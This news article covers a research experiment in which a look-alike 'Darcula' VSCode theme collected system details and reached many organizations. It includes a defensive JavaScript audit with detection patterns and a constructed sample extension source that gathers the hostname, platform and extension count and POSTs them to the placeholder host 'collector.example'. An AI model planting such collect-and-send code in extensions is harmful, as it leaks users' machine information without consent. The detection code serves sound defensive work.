Malicious VSCode Extensions Discovered in Marketplace

A group of Israeli researchers has shown how easily malicious Visual Studio Code (VSCode) extensions can reach the VSCode Marketplace and spread from there: by adding information-gathering code to a copy of the popular ‘Dracula Official’ theme, a theme with millions of installs, they got their look-alike extension installed inside more than 100 organizations.

Visual Studio Code, developed by Microsoft, is a widely used source code editor among professional software developers globally. The Visual Studio Code Marketplace, operated by Microsoft, offers a variety of extensions that enhance the functionality of the IDE and provide users with customization options.

Past reports have highlighted security weaknesses in the VSCode ecosystem, including extension and publisher impersonation and extensions that steal developer authentication tokens. Confirmed malicious extensions have also circulated in the marketplace.

In a recent experiment conducted by researchers Amit Assaraf, Itay Kruk, and Idan Dardikman, a fake extension named ‘Darcula’ was created to mimic the popular ‘Dracula Official’ theme. The legitimate Dracula theme boasts over 7 million installs on the VSCode Marketplace and is favored by developers for its visually appealing dark mode with a high-contrast color palette, designed to reduce eye strain during long coding sessions.

The ‘Darcula’ extension was published to the VSCode Marketplace together with a matching look-alike domain, ‘darculatheme.com.’ It reused the original Dracula theme code and added scripts that gathered system information: the hostname, the number of installed extensions, the device’s domain name and the operating system platform. The collected data was sent to a remote server in an HTTPS POST request. A color theme only needs to ship JSON color definitions, so the fact that the extension ran any code at all was the real tell.

One concerning aspect highlighted by the researchers is that code embedded in such extensions often goes undetected by traditional endpoint detection and response (EDR) tools. The extension runs inside the VSCode process, and a normal editor session already reads many files, executes commands, spawns child processes and talks to the network, so the extension’s file reads, process launches and outbound requests blend into legitimate activity that EDRs cannot flag as suspicious.
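Because the behaviour described above looks like ordinary editor activity from the EDR’s point of view, a more reliable check is at the extension level: a theme has no business declaring an entry point or activating on startup, and its source has no business looking up the hostname and posting it anywhere. The following audit is an added example written for this article, not code from the researchers or from VSCode; the manifests, the source snippet and the `collector.example` endpoint are constructed for illustration.

```javascript
'use strict';

// A pure colour theme only needs `contributes.themes`. An entry point (`main`
// or `browser`) or a startup activation event means the extension runs code in
// the editor process, which is exactly what turned the look-alike theme into
// a collector.
function auditManifest(manifest) {
  const findings = [];
  const contributesThemes = Boolean(manifest.contributes && manifest.contributes.themes);
  const entryPoint = manifest.main || manifest.browser;
  const events = manifest.activationEvents || [];

  if (contributesThemes && entryPoint) {
    findings.push(`theme extension declares an entry point (${entryPoint})`);
  }
  if (events.includes('*') || events.includes('onStartupFinished')) {
    findings.push(`activates on startup (${events.join(', ')})`);
  }
  return findings;
}

// Source-level indicators matching the collect-and-post pattern described in
// the article. Each hit is a reason to read the code, not proof of malice:
// plenty of legitimate extensions make network requests.
const INDICATORS = [
  { name: 'hostname lookup', re: /\bos\.hostname\s*\(/ },
  { name: 'platform lookup', re: /\bos\.platform\s*\(/ },
  { name: 'enumerates installed extensions', re: /vscode\.extensions\.all\b/ },
  { name: 'outbound HTTP(S) request', re: /\b(https?\.request|fetch)\s*\(/ },
  { name: 'spawns child process', re: /\bchild_process\b/ },
];

function scanSource(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
}

function auditExtension(manifest, source) {
  return { manifest: auditManifest(manifest), source: scanSource(source || '') };
}

// Constructed sample data: a legitimate pure theme and a look-alike that adds
// an entry point and starts with the editor.
const THEME_CONTRIBUTION = {
  themes: [{ label: 'Example Dark', uiTheme: 'vs-dark', path: './themes/dark.json' }],
};

const BENIGN_THEME_MANIFEST = {
  name: 'example-theme',
  contributes: THEME_CONTRIBUTION,
};

const LOOKALIKE_MANIFEST = {
  name: 'example-theme-lookalike',
  main: './out/extension.js',
  activationEvents: ['*'],
  contributes: THEME_CONTRIBUTION,
};

// Constructed source text in the shape the article describes (gather host
// facts, POST them out). It is data for the scanner, not code that runs here;
// `collector.example` is a placeholder, not a real endpoint.
const LOOKALIKE_SOURCE = `
const os = require('os');
const https = require('https');
const vscode = require('vscode');
function activate() {
  const body = JSON.stringify({
    hostname: os.hostname(),
    platform: os.platform(),
    extensions: vscode.extensions.all.length,
  });
  const req = https.request({ host: 'collector.example', method: 'POST', path: '/' });
  req.end(body);
}
`;

console.log(JSON.stringify(auditExtension(BENIGN_THEME_MANIFEST, ''), null, 2));
console.log(JSON.stringify(auditExtension(LOOKALIKE_MANIFEST, LOOKALIKE_SOURCE), null, 2));
```

To use it against a real machine, feed `auditManifest` the parsed `package.json` of each directory under `~/.vscode/extensions/` (the default install location) and `scanSource` the contents of the file named in its `main` field; a theme that produces any manifest finding deserves a manual read before it stays installed.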

With thousands of extensions and millions of installs on the VSCode Marketplace, stronger controls against malicious extensions remain a pressing concern both for developers and for the organizations whose machines run them.
